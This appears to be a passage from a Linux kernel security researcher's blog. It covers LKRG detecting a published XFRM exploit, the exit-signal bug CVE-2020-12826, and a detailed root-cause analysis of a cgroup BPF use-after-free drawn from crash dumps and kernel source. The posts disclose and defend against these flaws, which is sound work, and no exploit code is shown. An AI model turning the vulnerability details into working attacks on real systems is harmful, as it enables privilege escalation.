🔒
There are new articles available, click to refresh the page.
Before yesterdaypi3 blog

Linux kernel XFRM UAF

21 March 2020 at 01:27
By: pi3

On 28th of February, I’ve sent a short summary to lkrg-users mailing list (https://www.openwall.com/lists/lkrg-users/2020/02/28/1) regarding recent Linux kernel XFRM UAF exploit dropped by Vitaly Nikolenko. I believe it is worth reading and I’ve decided to reference it on my blog as well:

Hey,

Vitaly Nikolenko published an exploit for Linux kernel XFRM use-after-free. His tweet with more details can be found here:

centos 8 / rhel 8 / ubuntu 14.04, 16.04, 18.04 poc is uploaded https://t.co/b3IJoxMaHI. The tech report is public too https://t.co/UHsMYScN9Y pic.twitter.com/uDpjEm0ycX

— Vitaly Nikolenko (@vnik5287) February 28, 2020

Detailed description of the bug can be found here:

https://duasynt.com/pub/vnik/01-0311-2018.pdf

I’ve tested his exploit under the latest version of LKRG (from the repo) and it correctly detects and kills it:

[Fri Feb 28 10:04:24 2020] [p_lkrg] Loading LKRG…
[Fri Feb 28 10:04:24 2020] Freezing user space processes … (elapsed 0.008 seconds) done.
[Fri Feb 28 10:04:24 2020] OOM killer disabled.
[Fri Feb 28 10:04:24 2020] [p_lkrg] Verifying 21 potential UMH paths for whitelisting…
[Fri Feb 28 10:04:24 2020] [p_lkrg] 6 UMH paths were whitelisted…
[Fri Feb 28 10:04:25 2020] [p_lkrg] [kretprobe] register_kretprobe() for  failed! [err=-22]
[Fri Feb 28 10:04:25 2020] [p_lkrg] ERROR: Can't hook ovl_create_or_link function :(
[Fri Feb 28 10:04:25 2020] [p_lkrg] LKRG initialized successfully!
[Fri Feb 28 10:04:25 2020] OOM killer enabled.
[Fri Feb 28 10:04:25 2020] Restarting tasks … done.
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  Trying to kill process[lucky0 | 67342]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!

Latest LKRG detects user_namespace corruption, which in a way proofs that our namespace escape logic works. When I’ve made the same test, but reverting LKRG code base to the commit just before namespace corruption detection, LKRG is still detecting it via standard method:

[Fri Feb 28 10:34:28 2020] [p_lkrg]  process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] Trying to kill process[lucky0 | 17599]!

[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] Trying to kill process[lucky0 | 22293]!

This is an interesting case. Vitaly published just a compiled binary of his exploit (not a source code). This means that adopting his exploit to play cat-and-mouse game with LKRG is not an easy task. It is possible to reverse-engineer it and modify the exploit binary, however it’s more work.

Thanks,

Adam

Linux kernel bug – all kernels insufficiently restrict exit signals

26 March 2020 at 00:09
By: pi3

I’ve recently spent some time looking at ‘exec_id’ counter. Historically, Linux kernel had 2 independent security problems related to that code: CVE-2009-1337 and CVE-2012-0056.

Until 2012, ‘self_exec_id’ field (among others) was used to enforce permissions checking restrictions for /proc/pid/{mem/maps/…} interface. However, it was done poorly and a serious security problem was reported, known as “Mempodipper” (CVE-2012-0056). Since that patch, ‘self_exec_id’ is not tracked anymore, but kernel is looking at process’ VM during the time of the open().

In 2009 Oleg Nesterov discovered that Linux kernel has an incorrect logic to reset ->exit_signal. As a result, the malicious user can bypass it if it execs the setuid application before exiting (->exit_signal won’t be reset to SIGCHLD). CVE-2009-1337 was assigned to track this issue.

The logic responsible for handling ->exit_signal has been changed a few times and the current logic is locked down since Linux kernel 3.3.5. However, it is not fully robust and it’s still possible for the malicious user to bypass it. Basically, it’s possible to send arbitrary signals to a privileged (suidroot) parent process.

I’ve summarized my analysis and posted on LKML:
https://lists.openwall.net/linux-kernel/2020/03/24/1803

and kernel-hardening mailing list:
https://www.openwall.com/lists/kernel-hardening/2020/03/25/1

Btw. Kernels 2.0.39 and 2.0.40 look secure 😉

Thanks,
Adam

CVE-2020-12826

15 May 2020 at 00:21
By: pi3

CVE-2020-12826 is assigned to track the problem with Linux kernel which I’ve described in my previous post:

CVE MITRE described the problem pretty accurately:

A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.

RedHat tracks this issue here:

https://bugzilla.redhat.com/show_bug.cgi?id=1822077

Debian here:

https://security-tracker.debian.org/tracker/CVE-2020-12826

Fix can be found here:

https://github.com/torvalds/linux/commit/7395ea4e65c2a00d23185a3f63ad315756ba9cef

What is interesting, the story of insufficient restriction of the exit signals might not be ended 😉

How did this pass review and get backported to stable kernels? https://t.co/WhBrqUZhrw (Hint: case of right hand not knowing what the left is doing, involving a recent security fix)

— grsecurity (@grsecurity) May 14, 2020

In short, the following patch reintroduces the same problem:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b5f2006144c6ae941726037120fa1001ddede784

Best regards,
Adam

Effectiveness of Linux Rootkit Detection Tools

15 June 2020 at 03:40
By: pi3

I would like to draw draw attention to the following Openwall’s tweet:

Juho Junnila's Master's Thesis "Effectiveness of Linux Rootkit Detection Tools" shows our LKRG as by far the most effective kernel rootkit detector (of those tested), even though that wasn't our primary focus: https://t.co/pz0r502dK6 h/t @Adam_pi3

— Openwall (@Openwall) June 14, 2020

and the full post on LKRG’s mailing list here:

https://www.openwall.com/lists/lkrg-users/2020/06/14/5

Thanks,
Adam

LKRG 0.8

25 June 2020 at 21:49
By: pi3

Hi,

We’ve just announced a new version of LKRG 0.8!  It includes enormous amount of changes – in fact, so much that we’re not trying to document all of the changes this time (although they can be seen from the git commits), but rather focus on high-level aspects. I encourage to read full announcement here:

https://www.openwall.com/lists/announce/2020/06/25/1

Btw. Among others, we have added support for Raspberry Pi 3 & 4, better scalability, performance, and tradeoffs, the notion of profiles, new documentation, @Phoronix benchmarks, and more

Best regards,
Adam

CVE: 2020-14356 & 2020-25220

11 September 2020 at 05:35
By: pi3

The short story of 1 Linux Kernel Use-After-Free bug and 2 CVEs (CVE-2020-14356 and CVE-2020-25220)

Name:     Linux kernel Cgroup BPF Use-After-Free
Author:   Adam Zabrocki ([email protected])
Date:       May 27, 2020

First things first – short history:

In 2019 Tejun Heo discovered a racing problem with lifetime of the cgroup_bpf which could result in double-free and other memory corruptions. This bug was fixed in kernel 5.3. More information about the problem and the patch can be found here:

https://lore.kernel.org/patchwork/patch/1094080/

Roman Gushchin discovered another problem with the newly fixed code which could lead to use-after-free vulnerability. His report and fix can be found here:

https://lore.kernel.org/bpf/[email protected]/

During the discussion on the fix, Alexei Starovoitov pointed out that walking through the cgroup hierarchy without holding cgroup_mutex might be dangerous:

https://lore.kernel.org/bpf/[email protected]/

However, Roman and Alexei concluded that it shouldn’t be a problem:

https://lore.kernel.org/bpf/[email protected]/

Unfortunately, there is another Use-After-Free bug related to the Cgroup BPF release logic.

The “new” bug – details (a lot of details ;-)):

During LKRG development and tests, one of my VMs was generating a kernel crash during shutdown procedure. This specific machine had the newest kernel at that time (5.7.x) and I compiled it with all debug information as well as SLAB DEBUG feature. When I analyzed the crash, it had nothing to do with LKRG. Later I confirmed that kernels without LKRG are always hitting that issue:

      KERNEL: linux-5.7/vmlinux
    DUMPFILE: /var/crash/202006161848/dump.202006161848  [PARTIAL DUMP]
        CPUS: 1
        DATE: Tue Jun 16 18:47:40 2020
      UPTIME: 14:09:24
LOAD AVERAGE: 0.21, 0.37, 0.50
       TASKS: 234
    NODENAME: oi3
     RELEASE: 5.7.0-g4
     VERSION: #28 SMP PREEMPT Fri Jun 12 18:09:14 UTC 2020
     MACHINE: x86_64  (3694 Mhz)
      MEMORY: 8 GB
       PANIC: "Oops: 0000 [#1] PREEMPT SMP PTI" (check log for details)
         PID: 1060499
     COMMAND: "sshd"
        TASK: ffff9d8c36b33040  [THREAD_INFO: ffff9d8c36b33040]
         CPU: 0
       STATE:  (PANIC)

crash> bt
PID: 1060499  TASK: ffff9d8c36b33040  CPU: 0   COMMAND: "sshd"
 #0 [ffffb0fc41b1f990] machine_kexec at ffffffff9404d22f
 #1 [ffffb0fc41b1f9d8] __crash_kexec at ffffffff941c19b8
 #2 [ffffb0fc41b1faa0] crash_kexec at ffffffff941c2b60
 #3 [ffffb0fc41b1fab0] oops_end at ffffffff94019d3e
 #4 [ffffb0fc41b1fad0] page_fault at ffffffff95c0104f
    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9423e801  RSP: ffffb0fc41b1fb88  RFLAGS: 00010246
    RAX: 0000000000000000  RBX: ffff9d8d56ae1ee0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9d8e25c40b00  RDI: ffffffff9423e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001
    ORIG_RAX: ffffffffffffffff  CS: 0010  SS: 0018
 #5 [ffffb0fc41b1fbd0] ip_finish_output at ffffffff957d71b3
 #6 [ffffb0fc41b1fbf8] __ip_queue_xmit at ffffffff957d84e1
 #7 [ffffb0fc41b1fc50] __tcp_transmit_skb at ffffffff957f4b27
 #8 [ffffb0fc41b1fd58] tcp_write_xmit at ffffffff957f6579
 #9 [ffffb0fc41b1fdb8] __tcp_push_pending_frames at ffffffff957f737d
#10 [ffffb0fc41b1fdd0] tcp_close at ffffffff957e6ec1
#11 [ffffb0fc41b1fdf8] inet_release at ffffffff9581809f
#12 [ffffb0fc41b1fe10] __sock_release at ffffffff95616848
#13 [ffffb0fc41b1fe30] sock_close at ffffffff956168bc
#14 [ffffb0fc41b1fe38] __fput at ffffffff942fd3cd
#15 [ffffb0fc41b1fe78] task_work_run at ffffffff94148a4a
#16 [ffffb0fc41b1fe98] do_exit at ffffffff9412b144
#17 [ffffb0fc41b1ff08] do_group_exit at ffffffff9412b8ae
#18 [ffffb0fc41b1ff30] __x64_sys_exit_group at ffffffff9412b92f
#19 [ffffb0fc41b1ff38] do_syscall_64 at ffffffff940028d7
#20 [ffffb0fc41b1ff50] entry_SYSCALL_64_after_hwframe at ffffffff95c0007c
    RIP: 00007fe54ea30136  RSP: 00007fff33413468  RFLAGS: 00000202
    RAX: ffffffffffffffda  RBX: 00007fff334134e0  RCX: 00007fe54ea30136
    RDX: 00000000000000ff  RSI: 000000000000003c  RDI: 00000000000000ff
    RBP: 00000000000000ff   R8: 00000000000000e7   R9: fffffffffffffdf0
    R10: 000055a091a22d09  R11: 0000000000000202  R12: 000055a091d67f20
    R13: 00007fe54ea5afa0  R14: 000055a091d7ef70  R15: 000055a091d70a20
    ORIG_RAX: 00000000000000e7  CS: 0033  SS: 002b

1060499 is a sshd’s child:

...
root        5462  0.0  0.0  12168  7276 ?        Ss   04:38   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
...
root     1060499  0.0  0.1  13936  9056 ?        Ss   17:51   0:00  \_ sshd: pi3 [priv]
pi3      1062463  0.0  0.0  13936  5852 ?        S    17:51   0:00      \_ sshd: [email protected]/3
...

Crash happens in function “__cgroup_bpf_run_filter_skb”, exactly in this piece of code:

0xffffffff9423e7ee <__cgroup_bpf_run_filter_skb+382>: callq  0xffffffff94153cb0 <preempt_count_add>
0xffffffff9423e7f3 <__cgroup_bpf_run_filter_skb+387>: callq  0xffffffff941925a0 <__rcu_read_lock>
0xffffffff9423e7f8 <__cgroup_bpf_run_filter_skb+392>: mov 0x3e8(%rbp),%rax
0xffffffff9423e7ff <__cgroup_bpf_run_filter_skb+399>: xor %ebp,%ebp
0xffffffff9423e801 <__cgroup_bpf_run_filter_skb+401>: mov 0x10(%rax),%rdi
                                                          ^^^^^^^^^^^^^^^
0xffffffff9423e805 <__cgroup_bpf_run_filter_skb+405>: lea 0x10(%rax),%r14
0xffffffff9423e809 <__cgroup_bpf_run_filter_skb+409>: test %rdi,%rdi

where RAX: 0000000000000000. However, when I was playing with repro under SLAB_DEBUG, I often got RAX: 6b6b6b6b6b6b6b6b:

    [exception RIP: __cgroup_bpf_run_filter_skb+401]
    RIP: ffffffff9123e801  RSP: ffffb136c16ffb88  RFLAGS: 00010246
    RAX: 6b6b6b6b6b6b6b6b  RBX: ffff9ce3e5a0e0e0  RCX: 0000000000000028
    RDX: 0000000000000000  RSI: ffff9ce3de26b280  RDI: ffffffff9123e7f3
    RBP: 0000000000000000   R8: 0000000000000000   R9: 0000000000000000
    R10: 0000000000000003  R11: 0000000000000000  R12: 0000000000000000
    R13: 0000000000000000  R14: 0000000000000000  R15: 0000000000000001

So we have kind of a Use-After-Free bug. This bug is triggerable from user-mode. I’ve looked under IDA for the binary:

.text:FFFFFFFF8123E7EE skb = rbx      ; sk_buff * ; PIC mode
.text:FFFFFFFF8123E7EE type = r15     ; bpf_attach_type
.text:FFFFFFFF8123E7EE save_sk = rsi  ; sock *
.text:FFFFFFFF8123E7EE        call    near ptr preempt_count_add-0EAB43h
.text:FFFFFFFF8123E7F3        call    near ptr __rcu_read_lock-0AC258h ; PIC mode
.text:FFFFFFFF8123E7F8        mov     ret, [rbp+3E8h]
.text:FFFFFFFF8123E7FF        xor     ebp, ebp
.text:FFFFFFFF8123E801 _cn = rbp      ; u32
.text:FFFFFFFF8123E801        mov     rdi, [ret+10h]  ; prog
.text:FFFFFFFF8123E805        lea     r14, [ret+10h]

and this code is referencing cgroups from the socket. Source code:

int __cgroup_bpf_run_filter_skb(struct sock *sk,
				struct sk_buff *skb,
				enum bpf_attach_type type)
{
    ...
	struct cgroup *cgrp;
    ...
... cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data); ... if (type == BPF_CGROUP_INET_EGRESS) { ret = BPF_PROG_CGROUP_INET_EGRESS_RUN_ARRAY( cgrp->bpf.effective[type], skb, __bpf_prog_run_save_cb); ... ... }

Debugger:

crash> x/4i 0xffffffff9423e7f8
   0xffffffff9423e7f8:  mov    0x3e8(%rbp),%rax
   0xffffffff9423e7ff:  xor    %ebp,%ebp
   0xffffffff9423e801:  mov    0x10(%rax),%rdi
   0xffffffff9423e805:  lea    0x10(%rax),%r14
crash> p/x (int)&((struct cgroup*)0)->bpf
$2 = 0x3e0
crash> ptype struct cgroup_bpf
type = struct cgroup_bpf {
    struct bpf_prog_array *effective[28];
    struct list_head progs[28];
    u32 flags[28];
    struct bpf_prog_array *inactive;
    struct percpu_ref refcnt;
    struct work_struct release_work;
}
crash> print/a sizeof(struct bpf_prog_array)
$3 = 0x10
crash> print/a ((struct sk_buff *)0xffff9ce3e5a0e0e0)->sk
$4 = 0xffff9ce3de26b280
crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

We also know that R15: 0000000000000001 == type == BPF_CGROUP_INET_EGRESS

crash> p/a ((struct cgroup *)0xffff9ce3e2416800)->bpf.effective[1]
$6 = 0x6b6b6b6b6b6b6b6b
crash> x/20a 0xffff9ce3e2416800
0xffff9ce3e2416800:     0x6b6b6b6b6b6b016b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416810:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416820:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416830:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416840:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416850:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416860:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416870:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416880:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416890:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
crash>

This pointer (struct cgroup *)

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

Points to the freed object. However, kernel still keeps eBPF rules attached to the socket under cgroups. When process (sshd) dies (do_exit() call) and cleanup is executed, all sockets are being closed. If such socket has “pending” packets, the following code path is executed:

do_exit -> ... -> sock_close -> __sock_release -> inet_release -> tcp_close -> __tcp_push_pending_frames -> tcp_write_xmit -> __tcp_transmit_skb -> __ip_queue_xmit -> ip_finish_output -> __cgroup_bpf_run_filter_skb

However, there is nothing wrong with such logic and path. The real problem is that cgroups disappeared while still holding active clients. How is that even possible? Just before the crash I can see the following entry in kernel logs:

[190820.457422] ------------[ cut here ]------------
[190820.457465] percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[190820.457511] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457511] Modules linked in: [last unloaded: p_lkrg]
[190820.457513] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Tainted: G           OE     5.7.0-g4 #28
[190820.457513] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[190820.457515] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457516] Code: eb b6 80 3d 11 95 5a 02 00 0f 85 65 ff ff ff 48 8b 55 d8 48 8b 75 e8 48 c7 c7 d0 9f 78 93 c6 05 f5 94 5a 02 01 e8 00 57 88 ff <0f> 0b e9 43 ff ff ff 0f 0b eb 9d cc cc cc 8d 8c 16 ef be ad de 89
[190820.457516] RSP: 0018:ffffb136c0087e00 EFLAGS: 00010286
[190820.457517] RAX: 0000000000000000 RBX: 7ffffffffffeec4a RCX: 0000000000000000
[190820.457517] RDX: 0000000000000101 RSI: ffffffff949235c0 RDI: 00000000ffffffff
[190820.457517] RBP: ffff9ce3e204af20 R08: 6d6f7461206f7420 R09: 63696d6f7461206f
[190820.457517] R10: 7320726574666120 R11: 676e696863746977 R12: 00003452c5002ce8
[190820.457518] R13: ffff9ce3f6e2b450 R14: ffff9ce2c7fc3100 R15: 0000000000000000
[190820.457526] FS:  0000000000000000(0000) GS:ffff9ce3f6e00000(0000) knlGS:0000000000000000
[190820.457527] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[190820.457527] CR2: 00007f516c2b9000 CR3: 0000000222c64006 CR4: 00000000003606f0
[190820.457550] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[190820.457551] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[190820.457551] Call Trace:
[190820.457577]  rcu_core+0x1df/0x530
[190820.457598]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457609]  __do_softirq+0xfc/0x331
[190820.457629]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457630]  run_ksoftirqd+0x21/0x30
[190820.457649]  smpboot_thread_fn+0x195/0x230
[190820.457660]  kthread+0x139/0x160
[190820.457670]  ? __kthread_bind_mask+0x60/0x60
[190820.457671]  ret_from_fork+0x35/0x40
[190820.457682] ---[ end trace 63d2aef89e998452 ]---

I was testing the same scenario a few times and I had the following results:

 percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-18829) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-29849) after switching to atomic

Let’s look at this function:

/**
 * cgroup_bpf_release_fn() - callback used to schedule releasing
 *                           of bpf cgroup data
 * @ref: percpu ref counter structure
 */
static void cgroup_bpf_release_fn(struct percpu_ref *ref)
{
	struct cgroup *cgrp = container_of(ref, struct cgroup, bpf.refcnt);

	INIT_WORK(&cgrp->bpf.release_work, cgroup_bpf_release);
	queue_work(system_wq, &cgrp->bpf.release_work);
}

So that’s the callback used to release bpf cgroup data. Sounds like it is being called while there could be still active socket attached to such cgroup:

/**
 * cgroup_bpf_release() - put references of all bpf programs and
 *                        release all cgroup bpf data
 * @work: work structure embedded into the cgroup to modify
 */
static void cgroup_bpf_release(struct work_struct *work)
{
	struct cgroup *p, *cgrp = container_of(work, struct cgroup,
					       bpf.release_work);
	struct bpf_prog_array *old_array;
	unsigned int type;

	mutex_lock(&cgroup_mutex);

	for (type = 0; type < ARRAY_SIZE(cgrp->bpf.progs); type++) {
		struct list_head *progs = &cgrp->bpf.progs[type];
		struct bpf_prog_list *pl, *tmp;

		list_for_each_entry_safe(pl, tmp, progs, node) {
			list_del(&pl->node);
			if (pl->prog)
				bpf_prog_put(pl->prog);
			if (pl->link)
				bpf_cgroup_link_auto_detach(pl->link);
			bpf_cgroup_storages_unlink(pl->storage);
			bpf_cgroup_storages_free(pl->storage);
			kfree(pl);
			static_branch_dec(&cgroup_bpf_enabled_key);
		}
		old_array = rcu_dereference_protected(
				cgrp->bpf.effective[type],
				lockdep_is_held(&cgroup_mutex));
		bpf_prog_array_free(old_array);
	}

	mutex_unlock(&cgroup_mutex);

	for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
		cgroup_bpf_put(p);

	percpu_ref_exit(&cgrp->bpf.refcnt);
	cgroup_put(cgrp);
}

while:

static void bpf_cgroup_link_auto_detach(struct bpf_cgroup_link *link)
{
	cgroup_put(link->cgroup);
	link->cgroup = NULL;
}

So if cgroup dies, all the potential clients are being auto_detached. However, they might not be aware about such situation. When is cgroup_bpf_release_fn() executed?

/**
 * cgroup_bpf_inherit() - inherit effective programs from parent
 * @cgrp: the cgroup to modify
 */
int cgroup_bpf_inherit(struct cgroup *cgrp)
{
    ...
  	ret = percpu_ref_init(&cgrp->bpf.refcnt, cgroup_bpf_release_fn, 0,
			      GFP_KERNEL);
    ...
}

It is automatically executed when cgrp->bpf.refcnt drops to 1. However, in the warning logs before kernel had crashed, we saw that such reference counter is below 0. Cgroup was already freed.

Originally, I thought that the problem might be related to the code walking through the cgroup hierarchy without holding cgroup_mutex, which was pointed out by Alexei. I’ve prepared the patch and recompiled the kernel:

$ diff -u cgroup.c linux-5.7/kernel/bpf/cgroup.c
--- cgroup.c    2020-05-31 23:49:15.000000000 +0000
+++ linux-5.7/kernel/bpf/cgroup.c       2020-07-17 16:31:10.712969480 +0000
@@ -126,11 +126,11 @@
                bpf_prog_array_free(old_array);
        }

-       mutex_unlock(&cgroup_mutex);
-
        for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
                cgroup_bpf_put(p);

+       mutex_unlock(&cgroup_mutex);
+
        percpu_ref_exit(&cgrp->bpf.refcnt);
        cgroup_put(cgrp);
 }

Interestingly, without this patch I was able to generate this kernel crash every time when I was rebooting the machine (100% repro). After this patch crashing ratio dropped to around 30%. However, I was still able to hit the same code-path and generate kernel dump. The patch indeed helps but it looks like it’s not the real problem since I can still hit the crash (just much less often).

I stepped back and looked again where the bug is. Corrupted pointer (struct cgroup *) is comming from that line:

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

this code is related to the CONFIG_SOCK_CGROUP_DATA. Linux source has an interesting comment about it in “cgroup-defs.h” file:

/*
 * sock_cgroup_data is embedded at sock->sk_cgrp_data and contains
 * per-socket cgroup information except for memcg association.
 *
 * On legacy hierarchies, net_prio and net_cls controllers directly set
 * attributes on each sock which can then be tested by the network layer.
 * On the default hierarchy, each sock is associated with the cgroup it was
 * created in and the networking layer can match the cgroup directly.
 *
 * To avoid carrying all three cgroup related fields separately in sock,
 * sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer.
 * On boot, sock_cgroup_data records the cgroup that the sock was created
 * in so that cgroup2 matches can be made; however, once either net_prio or
 * net_cls starts being used, the area is overriden to carry prioidx and/or
 * classid.  The two modes are distinguished by whether the lowest bit is
 * set.  Clear bit indicates cgroup pointer while set bit prioidx and
 * classid.
 *
 * While userland may start using net_prio or net_cls at any time, once
 * either is used, cgroup2 matching no longer works.  There is no reason to
 * mix the two and this is in line with how legacy and v2 compatibility is
 * handled.  On mode switch, cgroup references which are already being
 * pointed to by socks may be leaked.  While this can be remedied by adding
 * synchronization around sock_cgroup_data, given that the number of leaked
 * cgroups is bound and highly unlikely to be high, this seems to be the
 * better trade-off.
 */

and later:

/*
 * There's a theoretical window where the following accessors race with
 * updaters and return part of the previous pointer as the prioidx or
 * classid.  Such races are short-lived and the result isn't critical.
 */

This means that sock_cgroup_data “carries” the information whether net_prio or net_cls starts being used and in such case sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer. In our crash we can extract this information:

crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

Described socket keeps the “sk_cgrp_data” pointer with the information of being “attached” to the cgroup2. However, cgroup2 has been destroyed.
Now we have all the information to solve the mystery of this bug:

  1. Process creates a socket and both of them are inside some cgroup v2 (non-root)
    • cgroup BPF is cgroup2 only
  2. At some point net_prio or net_cls is being used:
    • this operation is disabling cgroup2 socket matching
    • now, all related sockets should be converted to use net_prio, and sk_cgrp_data should be updated
  3. The socket is cloned, but not the reference to the cgroup (ref: point 1)
    • this essentially moves the socket to the new cgroup
  4. All tasks in the old cgroup (ref: point 1) must die and when this happens, this cgroup dies as well
  5. When original process is starting to “use” the socket, it might attempt to access cgroup which is already “dead”. This essentially generates Use-After-Free condition
    • in my specific case, process was killed or invoked exit()
    • during the execution of do_exit() function, all file descriptors and all sockets are being closed
    • one of the socket still points to the previously destroyed cgroup2 BPF (OpenSSH might install BPF)
    • __cgroup_bpf_run_filter_skb runs attached BPF and we have Use-After-Free

To confirm that scenario, I’ve modified some of the Linux kernel sources:

  1. Function cgroup_sk_alloc_disable():
    • I’ve added dump_stack();
  2. Function cgroup_bpf_release():
    • I’ve moved mutex to guard code responsible for walking through the cgroup hierarchy

I’ve managed to reproduce this bug again and this is what I can see in the logs:

...
[   72.061197] kmem.limit_in_bytes is deprecated and will be removed. Please report your usecase to [email protected] if you depend on this functionality.
[   72.121572] cgroup: cgroup: disabling cgroup2 socket matching due to net_prio or net_cls activation
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[   72.121574] CPU: 0 PID: 6958 Comm: kubelet Kdump: loaded Not tainted 5.7.0-g6 #32
[   72.121574] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[   72.121575] Call Trace:
[   72.121580]  dump_stack+0x50/0x70
